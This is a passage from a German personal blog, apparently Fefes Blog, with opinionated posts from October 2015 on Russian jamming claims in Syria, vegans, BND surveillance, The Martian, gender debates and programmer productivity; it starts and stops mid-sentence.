In diesem Sinne, auf die guten alten Zeiten.
Und in zumindest einer Sache muss ich ihm inzwischen Recht geben. Hans hat damals gerne heraushängen lassen, dass er nur in der 1. Klasse Bahn fährt. Ich fand das damals schnöselig. Heute mache ich es auch. Manchmal geht es im Leben nicht darum, sein Geld möglichst effizient einzusetzen, sondern sich selbst Wertschätzung zu signalisieren.

Wed Oct 28 2015

[l] Voltairenet über den russischen Militäreinsatz in Syrien. Die zentrale Aussage des Artikels ist, dass die Russen in Damaskus erstmal ein Störsender-System installiert haben, das der Nato einen Totalausfall bereitet hat. Die Schilderungen klingen sehr fantastisch, insofern bin ich erstmal geneigt, dem nicht vollumfänglich glauben zu wollen. Letztlich geht es inhaltlich zurück auf die Geschichte mit der USS Donald Cook im Schwarzen Meer. Der Artikel sagt: a) Das war keine Propaganda, das System gibt es und es funktioniert und b) das haben die Russen jetzt in Syrien aufgebaut.
Ich musste spontan an die Geschichte denken, als die Briten ein paar russische Botschaftsangehörige ausgewiesen haben, wegen angeblicher Spionage. Und die Russen haben als Antwort lauter britische Diplomaten ausgewiesen. Aber nicht die Spione. Die haben 12 Leute ausgewiesen, und keiner von den war Spion. Die Russen haben den Briten damit gesagt: Wir wissen genau, wer eure Spione sind, und wir haben keine Angst vor ihnen. Die Russen demonstrieren gerne erdrückende Überlegenheit. Ich finde leider den Blogeintrag mit dieser Story gerade nicht mehr.
Die Amis haben panische Angst davor, Soldaten im Krieg zu verlieren, oder Verwundete heimfliegen zu müssen, weil ihnen das im Vietnamkrieg das Genick gebrochen hat. Wir erinnern uns an die Geschichte mit dem neuen F-35 und dem Dogfighting. Wenn es zu einem Dogfight kommen könnte, schicken die Amis gar keine Flugzeuge. Die Flugzeuge schicken sie erst, wenn sie die Lufthoheit sicher haben.
Die gesamte Überlegenheit der Amerikaner im konventionellen Krieg basiert also auf der Luftüberlegenheit.
Und die sollen die Russen jetzt mit diesem Störsender ausgeknipst haben.
Das wäre echt ein Ragnarök-Szenario für die Nato, wenn da was dran ist.
Und das würde auch erklären, wieso die Russen in letzter Zeit ein paar Mal den türkischen Luftraum verletzt haben sollen. Das wären dann Tests der Reichweite des Störsenders gewesen. Lustiges Detail am Rande:
Es scheint, dass Russland eine Absprache gemacht habe, um die Kommunikationen von Israel nicht zu stören – private US-Sache -, d. h., dass es sein Störungs-System nicht im südlichen Syrien entfalte.
Und wenn die AWACS der Nato nicht sicher sein können, dass ihr Radar ordentlich funktioniert, dann kann man sie überhaupt nicht einsetzen, weil sie dann verwundbar sind. Die halten sich normalerweise in der Ferne auf und kommen nicht nah genug ran, um sich selbst in Gefahr zu bringen. Aber woher weißt du denn, ob du in Gefahr bist, wenn dein Radar nicht tut? Und die No-Fly-Zone, die die Amis über Syrien verhängt haben, ist damit natürlich auch dahin.
Die technischen Details gehen auf diese rumänische Site zurück.
Tja. Und jetzt? Haltet ihr das für glaubwürdig?
Update: Sputnik hat ein Foto des Wundersystems.
Update: Ob die Navy deshalb wieder mit Sextanten unterrichtet?
Update: Hier ist der Blogeintrag mit den ausgewiesenen Nicht-Spionen. (Danke, Michael)

Mon Oct 26 2015

[l] Hier kommen gerade eine Tonne Mails von Veganern rein. Der gemeinsame Nenner ist:
1. Fefe verurteilt Veganer für das Verhalten Einzelner. Das ist total unfair!1!!
2. Es gibt aber total gute Argumente für Veganismus!1!! (Auch in der Form "aber veganes Essen kann auch schmecken!1!!")
3. Der Fefe wirft Veganer und Pegida einen Topf!1!!
Den dritten Punkt werde ich gar nicht mit einer Replik aufwerten. Wer auf DER Ebene schon ein Verständnisproblem hat, der sollte lieber den Adblocker deinstallieren und zum Springerverlag gehen. Die haben weniger komplexe Sätze und weniger Fremdwörter.
Der mittlere Punkt zeigt mir, dass hier gerade die Veganer reinkommen, die sonst im Internet fiese Bewertungen bei Cafes in Dublin hinterlassen. Die Argumente für oder gegen vegane Ernährung spielen überhaupt keine Rolle. Darum ging es gar nicht. Wer mir damit kommt, kann sich auch gleich ein "ich will gerne ins Killfile" auf die Stirn tätowieren.
Bleibt der erste Punkt. Hier kamen u.a. so Formulierungen rein wie "Dann bist du auch für die Gamergater verantwortlich!11!".
Leute, Leute, Leute. Was ICH denke spielt an der Stelle keine Rolle. Ich kenne vier Veganer, und alle haben mich irgendwann zu missionieren versucht, was ich überhaupt nicht leiden kann. Das prägt mein Bild von Veganern als nervige Kultanhänger. Ich kenne über ein Dutzend andere Menschen, die sich vegan ernähren. Und sicher noch Dutzende andere mehr, von denen es mir nicht bewusst ist, dass die sich vegan ernähren. Denn die laufen nicht rum und belästigen andere Leute mit ihren Essensgewohnheiten. Das ist für mich eine andere Gruppe als "die Veganer", denn das Label ist weitgehend vergiftet von den Missionaren. Ist für mich eine Stufe mit den Zeugen Jehovas.
Wer mir sagen will, dass das bei ihm anders ist, dem glaube ich nicht. Also nicht die konkreten Erfahrungen jetzt sondern dass man Gruppen nach dem Verhalten der Exemplare beurteilt, denen man begegnet ist.
Wenn sich in einer Gruppe von Menschen (in Form der Stichprobe, die ich aus der Gruppe kenne) Scheiße verhält, dann prägt das mein Bild der ganzen Gruppe. Und weil man nunmal die Lauten eher wahrnimmt als die Leisen, können fünf bekloppte Schreihälse eine an sich coole Bewegung von Tausenden kaputtmachen.
Es ist die Verantwortung der Gruppe, das zu klären und in Zukunft zu verhindern.
Sage ich das aus Sippenhaft-Gründen? Weil ich ein fieser Mensch bin, der gerne mit dem Finger auf andere zeigt? Nein. Ich sage das, weil für den Rest der Welt eure Gruppe nicht wichtig genug ist, dass sie von außen Besserung herbeizuführen versuchen würden. Ihr könnt euch ja mal selber fragen, wie krass ein Verein Scheiße machen muss, damit ihr euch als Nicht-Mitglied hinstellen und an Besserung arbeiten würdet. Die Schranke ist echt hoch. Oder hat jemand von euch von außen spontan beim ADAC, der FIFA oder VW zu helfen versucht? Na seht ihr.
Außer ihr seid so fiese Missionare. Dann ist wahrscheinlich eher nicht die Gruppe das Problem sondern ihr :)
Verhaltensprobleme in Gruppen sind wie offene Wunden. Viele davon gehen durch Ignorieren und Toleranz nicht weg. Sie eitern bloß vor sich hin und irgendwann muss man zum Chirurgen, weil es gar nicht mehr anders geht. Wenn ihr in eurer Gruppe die Wunde so lange eitern lasst, dass der Verfassungsschutz V-Leute schickt, dann ist es zu spät.
Ich habe mich ja lange Zeit über diese Fake-Freundlichkeit der Amerikaner geärgert. Wer sich da mal aufgehalten hat (außer vielleicht in Manhattan jetzt), der wird wissen, was ich meine. Alle haben so ein Plastiklächeln und grüßen freundlich, die Autos sind frisch gewaschen und das Gras in den Vorgärten frisch geschnitten und grün angemalt. Wer den Rasen nicht häufig genug schneidet, kriegt einen Strafbescheid vom Sheriff, weil das eine Ordnungswidrigkeit ist. Müll aus dem Auto werfen? Über 100 Dollar Strafe. Hinter dem Hund nicht die Kacke einsammeln? Über 100 Dollar Strafe. Fand ich immer total furchtbar. Aber auf der anderen Seite hat diese Herangehensweise an das Leben den Vorteil, dass man beim Rumlaufen nicht in Kaugummi oder Hundescheiße tritt. Die Gesellschaft als solche hat sich entschieden, dass Hundescheiße auf dem Bürgersteig ein Problem ist, und wenn wir das weghaben wollen, dann müssen wir da jetzt gemeinsam was tun. Ob strikte Strafen und Polizeistaat jetzt die Lösung sind, wage ich zu bezweifeln. Mir wäre es lieber, wenn die Hundehalter von sich aus die Disziplin aufbringen könnten.
In diesem Sinne. Macht auf eurem Bürgersteig bitte die Hundescheiße weg. Auch im übertragenen Sinne.
Update: Oh und meine Aussage ist auch nicht, dass ihr jetzt in der Bringschuld seid, den Arschlöchern in eurer Gruppe persönlich einen in die Fresse zu hauen. Aber der Rest der Gruppe muss denen klar kommunizieren, dass sie nicht erwünscht sind, dass sie sich gefälligst eine eigene Gruppe aufmachen sollen, und wenn sie renitent sind, dann muss man sich halt eine Strategie überlegen. Die Kirchen haben ja auch kein Problem, sich von der "Westboro Baptist Church" zu distanzieren. Und wenn die nicht weggehen, dann muss man halt immer Gegendemos machen.
Update: Vielleicht lieber explizit: Ja, für Gamergate fühle ich mich auch verantwortlich. Und für Leute, die Veganern sagen, sie gehören mal vergast (das scheint tatsächlich vorzukommen). Nicht weil ich solche Leute kenne oder selber so drauf bin. Aber wenn ich sowas sehe, dann gibt es negatives Feedback, da könnt ihr mal einen drauf lassen. Und dass ich jetzt hier gerade den Veganern negatives Feedback gebe, ist ja letztlich auch ein Zeichen dafür, dass ich das für einen Teil meines Verantwortungsbereiches halte und zu verbessern versuche, auch wenn ich gar nicht Teil der Gruppe bin. Ich könnte ja auch einfach sagen: Hey, Scheiß drauf, sollen die sich mal weiter zum Klops machen.

Fri Oct 23 2015

[l] Ich sage ja schon länger, dass der BND sicher keine Alleingänge gemacht hat. Behörden machen keine Alleingänge. Das ist mit Sicherheit von oben abgesegnet, und zwar nicht nur mündlich oder fernmündlich sondern schriftlich, mit Durchschlag, und zu den Akten gegeben. Niemand in Behörden macht auf Zuruf potentiell illegale Dinge (gut, Ausnahmen wie Polizei mal außen vor gelassen), ohne sich da mehrfach wasserdicht abgesichert zu haben.
Und tatsächlich: Für die Österreich-Abhör-Aktion gab es eine Genehmigung aus dem Kanzleramt. Und wer war da zuständig? Kommt ihr NIE drauf:
Der damalige Beamte im Bundeskanzleramt und spätere BND-Chef Ernst Uhrlau habe die Abhöraktionen genehmigt. Die politische Verantwortung trug damals Frank-Walter Steinmeier (SPD) als Kanzleramtsminister.
Die öffentlich-rechtliche Version der Drehtür. Wer kriminelle Machenschaften mitmacht und sich dafür potentiell angreifbar macht, ist Teil der Clique und darf BND-Chef werden.

Wed Oct 21 2015

[l] Videotipp: Ein fieser Eristiker hat aus Videomaterial von der Geburtstagsparade der Queen und Audio aus der Nordkoreaberichterstattung ein tolles Mashup gemacht.
[l] Ich habe The Martian noch nicht im Kino gesehen, aber von ein paar Freunden, die es geguckt haben, höre ich gerade, dass da einige wichtige Aspekte umgestellt wurden. Die Lektüre des Buches empfiehlt sich daher trotzdem, sogar eher mehr noch als vorher :)
Unter anderem ist es im Buch Mindy Park, die erkennt, dass auf dem Mars noch jemand am Leben ist, in ihrer Freizeit. Ich nahm anhand des Namens an, es handele sich um eine Asiatin, aber im Film ist das eine Weiße, und sie findet das nicht in ihrer Freizeit, sondern weil ihr Chef ihr sagt, sie soll da mal gucken. Mit Plotkürzungen kann ich leben, aber sowas finde ich nicht akzeptabel. Das ist ja gerade der Punkt an der Stelle, dass eben nicht "der Apparat" ihn findet sondern Kommissar Zufall in Form einer Freiwilligen, ein kleines Rädchen im Apparat, die da ohne expliziten Auftrag rumguckt.
Außerdem gibt es im Film wohl eine Szene, die im Buch nicht ist, wo sie sich abwertend darüber lustig machen, dass die Nasa-PR-Frau keine Ahnung von Raumfahrt hat. Diese Art von Blöße gibt sich das Buch nicht.
Meine Kumpels sagen, der Film lohnt sich trotzdem. Aber lest lieber vorher das Buch.
Update: Kommentar per Mail:
Ganz so ist es nicht. Auch im Film will die Leitung der NASA keine Fotos des Unglücksstelle, weil man die Fotos – wie im Buch – nach einer gewissen Zeit veröffentlichen muss, aber keine Bilder von Marc Watneys Leiche haben will. Es wird dann aber trotzdem gemacht.
Die Geschichte mit der PR-Beraterin ist zwar so, wie geschildert, aber das hat den Grund, dass es in so Filmen immer jemanden geben muss, dem man den technischen Kram erklären muss, damit ihn auch der Zuschauer erklärt bekommt. Da kann man eine neue Figur einführen oder man nimmt eine Figur, die schon da ist. Die Pressesprecherin ist da natürlich ein dankenswerter Kandidat. Im Buch erklärt Marc Watney selber diese ganzen Dinge. Das war einer der Punkte, bei denen ich mich gefragt habe, wie man das im Film rüberbringt und das ist meiner Meinung nach gut gelungen.
Aber ich muss trotzdem sagen, dass viel umgestellt wurde. Wohl viel aus Zeitmangel aber da hätte ich andere Dinge eher mehr gekürzt. Aber da werde ich nicht mit jemanden wie Ridley Scott streiten.
:-)
Update: Noch ein Kommentar:
ich dachte auch, dass Mindy Park eine Asiaten sei.
Die Besetzung von dem Charakter Mindy Park war wohl eine rein strategische, um sich an die "Halt and Catch Fire"-Fans anzuranzen. (https://de.wikipedia.org/wiki/Halt_and_Catch_Fire)
Denn Mindy Park wird gespielt von Mackenzie Davis (https://en.wikipedia.org/wiki/Mackenzie_Davis), und diese spielt als gut aussehende Nerd-Frau auch in The Martian eine völlig unglaubwürdige Figur. Mackenzie Davis ist privat nicht mit der Computerwelt in "Nerd-Form" groß geworden und schafft es nun mal in beiden Rollen keine Sekunde, dass man ihr die Spezialisten abnimmt.
Ah, von der Serie hatte ich noch nie gehört.
Update: Noch ein Einspruch:
ich habe sowohl das Buch als auch den Film innerhalb des letzten Monats gelesen bzw. gesehen, daher kann ich deine Aussage zu Mindy Park so nicht stehen lassen. Sie bekommt auch im Buch den Auftrag die Umlaufbahn der Satelliten so anzupassen, dass Bilder der Forschungsstation von Ares 3 übertragen werden. Sie schaut sich diese Bilder nur als erste an und findet dabei heraus, dass etwas nicht stimmt. Das macht Sie übrigens auch nicht in ihrer Freizeit.
Ich kann den Film zudem nicht empfehlen wenn man vorher das Buch gelesen hat. Die NASA rückt sehr ins Zentrum des Films (gefühlt ca. 60% NASA und 40% Mark Watney) und eine Vielzahl der Probleme die Watney auf dem Mars bewältigen muss werden, wenn überhaupt, nur im Schnelldurchlauf abgehandelt. Dazu kommt die lächerliche Hollywood-Abwandlung eines eigentlich guten Buchendes.
Zudem gibt es im Buch eine Kooperation zwischen chinesischen und amerikanischen Wissenschaftlern. Ich habe das im Buch so aufgefasst, dass Wissenschaftlern die Politik ihres Landes generell egal ist wenn sie die Möglichkeit haben andere Wissenschaftler zu unterstützen (natürlich muss das auch im Buch der chinesischen Regierung anders verkauft werden).
Im Film ist der chinesische Wissenschaftler dann der Onkel eines NASA-Mitarbeiters, denn wir alle Wissen, dass ein Chinese nur dann einem Amerikaner helfen würde, wenn er mindestens mit ihm verwandt ist. Von der ursprünglichen Aussage des Buches bleibt da nicht viel übrig.
[l] Es heißt ja immer so schön, dass Daten das Erdöl des 21. Jahrhunderts sind. Als Safe Harbor wegbrach, war das für die "Ölfirmen" in den USA schlimmer als für die Ölproduzenden in der EU, wie sich rausstellt, und so stellen die Amis jetzt ein Gesetz vor, das das Spice wieder fließen lassen soll. Allerdings:
Das US-amerikanische Repräsentantenhaus hat für ein Gesetz gestimmt, das manchen Ausländern das Recht geben soll, US-Behörden wegen Datenschutzverletzung zu verklagen – wenn die US-Behörden das wollen.
Die zu verklagenden Behörden müssen vorher einen Opt-In machen. WIE GEIL IST DAS DENN! Herr Richter, dieser Bankräuber hat aber keinen Opt-In gemacht, den können wir jetzt nicht verfolgen!
Oh und gegen Firmen hilft das natürlich schon mal gar nicht. Nur gegen Behörde. Die Opt-In gemacht haben.
Oh und wenn eine Behörde merkt, dass sie tatsächlich verklagt werden könnte, kann sie ihr Opt-In auch wieder zurückziehen. Nein, wirklich!
[l] Neulich: Drohnenvideo zeigt, wie Kobane heute aussieht.
Heute: Drohnenvideo aus Jobar (Stadtteil von Damaskus, Syrien).
Ich hielt das hier ja erst für ein Videospiel. Die haben da den Krieg gefilmt. Von der Optik und dem Sound her wie ein Livestream von C&C Generals mit aufgemotzter Grafik.
Heilige Scheiße ist das alles kaputt da. Da ist ja kein Haus mehr bewohnbar. Sieht aus wie nach einem Atomschlag.
Update: Ein Leser schickte mir dieses Foto von Damaskus von 2001.
Das Bild hab ich aus halber Höher von den Golanhöhen aus gemacht (2001). Hundert Meter weiter oben war der Grenzzaun der Israelis.
Damaskus hatte mal exzellente Infrastruktur, gebildete, zivilisierte und sehr hilfsbereite, gastfreundliche Leute … und jetzt das. Aleppo, Homs, alles in Schutt und Asche. Ich könnte heulen.
Update: Zu den Panzern, die man da sieht, schickte mir noch jemand diesen erhellenden Link.
Update: Ein anderer Einsender meint, das hier sei die Originalquelle und Liveleak eine gammelige Raubkopie. Die New York Times dazu.
Update: Das Foto ist nicht von den Golanhöhen sondern von einem Berg namens Jabal Qasjun.

Sun Oct 18 2015

[l] In Köln gab es einen gestern Attentatsversuch auf eine Kandidatin zur heutigen Oberbürgermeisterwahl. Der Täter ist anscheinend voll schuldfähig und gab an, es aus fremdenfeindlichen Motiven getan zu haben. Er war früher in einer dann schnell verbotenen nationalsozialistischen Partei tätig. Die Frau hat den Anschlag schwer verletzt überlebt, liegt aber noch im Krankenhaus.
Mal abgesehen von den offensichtlichen Reaktionen — Schock, Mitgefühl, Genesungswünsche, Abscheu, Wut — frage ich mich gerade, ob man bei sowas nicht die Wahl absagen muss. Wir haben recht strikte Regeln gegen Wahleinflussnahme und was erlaubte Wahlwerbung ist, in manchen anderen Ländern sieht man es noch strikter. Muss man nach so einem Anschlag nicht davon ausgehen, dass das Opfer aus Sympathiegründen mehr Stimmen kriegt als sie sonst gekriegt hätte? Müsste man nicht eigentlich sagen: Wir haben gerade eine Oderflut, die Wahl wird jetzt verschoben, damit der Schröder nicht unverdiente Stimmen einsackt?
Klar, machen wir nicht. Haben wir bei Schröder nicht gemacht, und auch bei dieser Wahl jetzt nicht. Und OB-Wahl ist ja auch weniger kritisch als Bundeskanzlerwahl.
Aber … müsste man das nicht eigentlich tun?
Was meint ihr?

Fri Oct 16 2015

[l] Seit einer Weile geht die Story rum, dass fiese Cyberkrieger per Cyberangriff einen Hochofen kaputt gemacht hätten, aber bisher hat nie einer gesagt, wessen Hochofen das gewesen sein soll.
Jetzt nennt Bloomberg erstmals ThyssenKrupp als Eigentümer.
[l] Habt ihr schonmal von Consent Workshops gehört? Das gibt es jetzt an Unis. Da wird Männern erklärt, dass sie nicht vergewaltigen sollen. Noch haben Männer auf dem Papier die Wahl, ob sie sich in so ein Umerziehungslager begeben wollen, aber wenn jemand nicht will, kriegt er einen Shitstorm.
Ich finde es bemerkenswert, dass die Proponenten von sowas nicht merken, was sie da fordern. Nein, Vergewaltigung ist nicht so viel schlimmer als alle anderen Straftaten. Wir haben auch keine "Mord ist uncool"-Workshops und keine "Völkermord ist nicht OK"-Workshops.
Wenn mir das an der Uni jemand angetragen hätte, hätte ich mich auch geweigert. Ich finde den Vorschlag, zu sowas hinzugehen, vergleichbar mit dem "Vorschlag", zu einer Einführung in die Benutzung von WCs zu gehen. Das sind zivilisatorische Grundregeln, von denen wir hier reden. Ich fordere von Frauen auch keine Teilnahme an "wie man sich Kleidung anzieht"- oder "wie man nicht auf den Boden scheißt"-Workshops. Das empfände ich als vergleichbar beleidigend.
Ich mache mir ja bei sowas nicht nur Sorgen, dass die Männer hier unter Generalverdacht gestellt werden. Ich mache mir auch echt Sorgen um die nächste Generation Frauen. Diese Art von sozialer Veränderung kommt häufig als Pendel. Das Pendel schwingt dann zu weit und dann schwingt es massiv zurück. Je weiter wir es jetzt überdrehen, desto krasser wird der Backlash. In 20 Jahren wird man dann als Mann moralisch fast alles verteidigen können, indem man zurück verweist auf was die Gender-Idologie den Männern in diesen Tagen alles brutal reingedrückt hat.
Das mit dem Pendel kann man heute schon an einigen Stellen beobachten. Hätte man bloß einfach gesagt, Hillary ist eine gute Kandidatin, fertig. Aber nein, man hat gesagt, wir brauchen eine Frau als Präsidentin. Man hat gesagt, wir brauchen eine Frau an der Spitze von HP. Wir brauchen eine Kanzlerin. Und damit ist die jeweilige Frau dann nicht mehr bloß sie selbst und wird nach ihren Fähigkeiten betrachtet, sondern sie ist die Botschafterin des ganzen Geschlechts. Und dann gucke ich mir an, wie HP unter der Fiorina implodiert ist, und wie krass die Merkel unser Land vor die Wand fährt, und denke mir: Die Frauen sind auch nicht besser. Hätte das irgendjemand gesagt, wenn wir dieses Podest nicht aufgebaut hätten? Die Männer sind auch alle schlecht! Schröder hat uns in den ersten Angriffskrieg geführt und unser Sozialsystem zerstört! Die Leute vorher bei HP waren auch alles Verlierer! Aber da hat keiner gesagt: Männer können das einfach nicht. Warum auch. Was für eine völlig bescheuerte Aussage, das am Geschlecht festzumachen. Aber die Frauen haben es am Geschlecht festgemacht und jetzt schlägt das Pendel zurück und Frauen müssen sich plötzlich gegen die Aussage verteidigen, dass sie auch nicht besser als Männer sind. NATÜRLICH NICHT! Das heißt nicht, dass sie nicht eine Chance verdient haben! Aber die Tür fällt jetzt langsam zu, weil ihr das Pendel zu weit gedrückt habt. Jetzt kommen Frauen anscheinend nur noch mit Quotenregeln weiter, und das ist ein gutes Mittel, alle unglücklich zu machen. Die Frauen und die Männer haben dann immer im Hinterkopf, dass diese Frau ja nichts können kann, denn sie kam nur per Quote rein. Wer will denn so ein Berufsleben führen?!
Ich persönlich halte Hillary für eine schlechte Kandidatin. Ihre Top 6 oder so Wahlkampfspender sind Wall Street. Die wird sicher nicht dafür sorgen, dass die Banker an die Kette gelegt werden. Aber Kritik an Hillary ist in diesem Klima auch sofort Kritik am weiblichen Geschlecht an sich. Also befürchte ich, dass Hillary Präsidentin wird, sich dann so verhält, wie es sich jetzt abzeichnet, und damit dafür sorgt, dass auf absehbare Zeit nie wieder eine Frau Präsidentin wird. Weil alle sehen konnten, dass die es auch nicht können, und weil wir die tatsächlichen Argumente für Hillary nicht zu Ohren gekriegt haben, weil es immer nur "aber sie ist eine Frau" hieß.
Auf der anderen Seite sind die Frauen, die sich still vor sich hin radikalisieren. Lest euch mal diese Stellungnahme von 2011 durch (Frage: Wie ist es als Frau in der Tech-Industrie). Und dann lest euch diese Stellungnahme der selben Frau von heute durch. Ich halte das für symptomatisch. Hat sich da inhaltlich so viel zum schlechten geändert oder hat sich eher ihre Perspektive geändert? Oder beides? Ich möchte übrigens nochmal auf das Jugendarbeitslosigkeitsproblem hinweisen an dieser Stelle. Die Situation ist im Moment für alle beschissen und wird es auch auf absehbare Zeit bleiben.
Update: Sagte ich freiwillig? Das war wohl eine Ausnahme. An Cambridge war die Teilnahme verpflichtend.

Mon Oct 12 2015

[l] Dänemark fährt die Steuervergünstigungen für Elektroautos runter, und Tesla will "dagegen vorgehen". Nur falls sich jemand Illusionen gemacht hat, ob Tesla irgendwie besser als andere Autobauer ist.
Aber hey, bald haben wir TTIP, dann kann Tesla ja Dänemark verklagen.

Sat Oct 10 2015

[l] Anscheinend soll es bald gesetzliche Vorschriften für den BND geben, die die das Abhören von EU-Bürgern unter ähnlich starke Schranken stellen wie das Abhören von Deutschen.
Auf der einen Seite ist das eine gute Sache, eine Errungenschaft. Auf der anderen Seite reden wir hier vom BND, der schon anderswo die paar Rudimente von gesetzlichen Schranken systematisch mit Füßen getreten hat. Bei einem Laden, der für die Amis auf Zuruf die deutsche Industrie abhört und ans Ausland weiterleitet, ist es am Ende des Tages echt egal, was für Gesetze es gibt. Der gehört zugemacht.

Wed Oct 7 2015

[l] In Mail-Diskussionen ist noch ein Punkt aufgekommen, den ich wohl besser mal öffentlich klarstelle. Da meinte jemand "Hey, wenn der Typ 5 Minuten suchen muss, und ich das in 10 Sekunden beantworten könnte, weil ich im Thema drin bin, dann ist das doch besser, wenn er das postet und ich antworte! Also in einem kleinen Team jetzt."
Nein. Also … jein. In manchen Gebieten mag das so sein. Unter Admins zum Beispiel, die häufig nur kurze Lastspitzen haben und ansonsten auf das Eintreffen von Katastrophen warten. Da kann man mal anfragen.
Aber für andere Fälle gilt: Unterbrechungen sind der Feind der Produktivität.. Es gab da einige Studien zu. Bei Programmierern ist es so, dass man sich in einen Zustand erhöhter Konzentration reinarbeiten kann, und da erreicht man dann maximale Produktivität. Dieser Zustand ist unter anderem als "Flow" oder "the Zone" bekannt. Nach einer Unterbrechung, und seien es nur Sekunden, ist der Flow weg und man braucht bis zu 30 Minuten (!), um sich da wieder reinzuarbeiten.
Daher ist es für die Produktivität absolut tödlich, Entwickler in Großraumbüros zu pferchen. Es reicht, wenn einer angerufen wird, und für alle ist die Produktivität versaut.
Schlimmer noch: Ich habe für mich festgestellt, dass ich meine maximale Performance erreiche, wenn ich meine Aufgabe in kleine Blöcke aufteile, die alle jeweils schnell gemacht sind. Dann habe ich die ganze Zeit ein Gefühl des Vorankommens, das dann als Motivation für das Weitermachen dient. Wenn ich während so eines Segmentes unterbrochen werde, schadet das nicht nur diesem Segment sondern den nächsten gleich mit.
Der oben verlinkte Artikel macht es an der Fehlerrate fest, nicht an der Produktivität. Das ist eine noch gruseligere Vorstellung für mich, dass ich mich produktiv fühle, aber dann später nachbessern muss. Und die sagen dort: Schon eine Zwei-Sekunden-Unterbrechung kann die Fehlerrate verdoppeln.
Das sind Größenordnungen der schlechten Folgen, die es für mich völlig offensichtlich machen, dass die Zeit anderer Leute nicht nur als Aggregat als wertvoll zu betrachten ist, sondern auch ein kurzer Impuls schon immense Schäden verursachen kann.
Das würde ich jetzt weniger auf Mailinglisten beziehen, denn die sortiert man ja normalerweise irgendwo hin und liest sie dann in den Pausen. Aber das generelle Argument, dass der andere das ja möglicherweise leichter beantworten kann als ich, und ich störe ja "bloß" 10 Leute und nicht 10000, selbst unter dem Gesichtspunkt ist das objektiv und auch moralisch verwerflich. Die moralische Verwerflichkeit konstruiere ich mir daraus, dass ich mich gelegentlich über eine kurze Sache über eine längere Zeit ärgern kann. Und daraus, dass das ein klassischer Fall von Externalisierung von Kosten ist. Genau so argumentieren Umweltverschmutzer und Subventionsbetrüger.
Update: Jetzt kommt hier Einspruch von einem Admin rein. Das sei keinesfalls so, dass man sich als Admin nicht konzentrieren müsse, denn sie nutzen die Zeit dann für Planung und Fortbildung und so. Fortbildung sehe ich ein. Aber alles andere sollte in Arbeitsgruppen gemacht werden, nicht "nebenher" von den Admins. Admins sind dafür da, Katastrophen nicht entstehen zu lassen, und wenn sie eintreten, einen Plan B zu haben. Wenn man die mit anderem Kram ablenkt, tut man niemandem einen Gefallen. In meinem Weltbild (und ich war auch ein paar Jahre als Admin tätig) erkennt man den guten Admin daran, dass er den ganzen Tag reddit klickt, weil er den ganzen anderen Scheiß wegautomatisiert hat. Ein Admin, der immer am arbeiten ist, ist wahrscheinlich im Feuerwehrmodus und überlastet und dann ist die gesamte IT-Infrastruktur wahrscheinlich in einem schlechten Zustand.
Update: Hmm, das war unglücklich formuliert oben. Diesen Zustand gibt es auch bei anderen Tätigkeiten, nicht nur beim Programmieren. Kinder beim Videospielen sind in der Zone, wenn man ein gutes Buch liest, ist man in der Zone, und auch beim Putzen oder Kochen kann man in die Zone kommen. Wenn man sich einen wirklich exzeptionell guten Vortrag anhört, kann man auch in die Zone kommen.
Update: Passender Comicstrip :-)
[l] Ich möchte hier mal eine These vertreten, um der Wahrheitsfindung zu dienen.
Wenn Linus sich auf Mailinglisten fies und gemein verhält, ist er immer noch sozialer (bzw weniger asozial) als die Twitter/Tumblr-Empörer. Denn Linus toleriert fremde Meinungen und gibt ihnen negatives Feedback, während die Twitter/Tumblr-Empörer fremde Meinungen direkt wegfiltern.
Sozial nutze ich hier im Wortsinne, mit anderen Menschen Dinge tun. Linus zu beschimpfen ist von außen immer einfach, aber wer von euch hält es denn tagein tagaus auf einer "feindlichen" Mailingliste der Größe von LKML aus? Mit lauter Leuten, die endlos Dinge von ihm wollen, und seine Ablehnung persönlich nehmen? Egal was er macht, jemand wird es als persönlichen Angriff werten? Er sagt endlos voraus, "wenn ihr $foo macht, wird das Scheiße", dann machen die Leute $foo und es wird Scheiße und er will das Ergebnis nicht aufnehmen und dann ist ER Schuld?!
Also ich als Nerd möchte hier mal ein paar Dinge zu Protokoll geben.
Erstens. Nerds sind im persönlichen Gespräch sozial unterlegen, aber sie haben für Online-Situationen völlig klare Algorithmen entwickelt, die beide Seiten vorher kennen. In Online-Medien gibt es Verwechslungen und Missverständnisse (ich möchte jeden, der Linus als geifernden Proleten sieht, mal einladen, eines seiner Videos zu gucken. Der Mann ist geradezu charmant und ein Sympathieträger im persönlichen Gespräch! Der Kontrast könnte kaum größer sein!). Nerds wissen das und reagieren entsprechend. Wichtigstes Mittel zur Vermeidung von schlechten Situationen ist negatives Feedback. Nerds wissen das und geben frühzeitig negatives Feedback. Nerds wissen auch, dass auf der anderen Seite möglicherweise jemand sitzt, der ihr negatives Feedback für einen persönlichen Angriff hält und daher möglicherweise ignoriert und dann die Zeit aller verplempert und viel Drama und Schaden anrichtet. Daher wird der Nerd, wenn er den Eindruck hat, sein negatives Feedback wurde ignoriert, nochmal nachlegen. Es gibt hier eine relativ klare Eskalationsstruktur. Wie schnell die eskaliert, hängt vom Medium ab. In meiner Inbox zum Beispiel, wenn ich jemandem schreibe, er soll weggehen, und der schreibt mir nochmal, dann frage ich zurück, welchen Teil von "geh weg" er nicht verstanden hat, und dass er weg gehen soll, und wer dann immer noch mal schreibt, der kommt ins ewige Killfile. Das ist meine Eskalationsstrategie. Auf Mailinglisten wird man im Allgemeinen etwas langsamer eskalieren, aber es läuft grob ähnlich ab.
Zweitens. Ich hatte neulich eine Mail, wo jemand folgende Situation schilderte. Mailingliste, einkommende Anfrage, Null Reaktion. Hey, das ist unhöflich, ich antworte mal. Hat geantwortet, die Antwort war nicht 100% korrekt, andere Leute korrigierten dann, und zwar auf der Mailingliste, nicht per privater Mail. Das wertete der Einsender als privaten Angriff auf sich, und was bilden sich diese Leute alle ein, wenn die das besser wissen, hätten sie ja was antworten können! Aber so läuft das nicht unter Nerds. Nerds können sich an der Stelle in den Gegenüber reinversetzen und wissen: Lieber keine Antwort als falsche Antwort. Falsche Antwort verplempert mehr Zeit. Und eine falsche Antwort ist auch für alle anderen auf der Mailingliste ein Affront, denn die müssen die jetzt korrigieren. Das soziale Konstrukt einer Mailingliste ist nämlich, dass es irgendwo ein Archiv gibt, und vor dem Fragen soll man bitte im Archiv gucken, ob die Frage schonmal gestellt und beantwortet wurde. Das ist so, weil überflüssige Mails an die Liste alle Subscriber Zeit kosten, dein Suchen aber nur dich. Nerds sind da Techies und berechnen die verbrauchte Energie. Wenn du im Archiv suchst, wird dir geholfen, und du kostet niemanden sonst Zeit. Wenn du deine Frage, die im 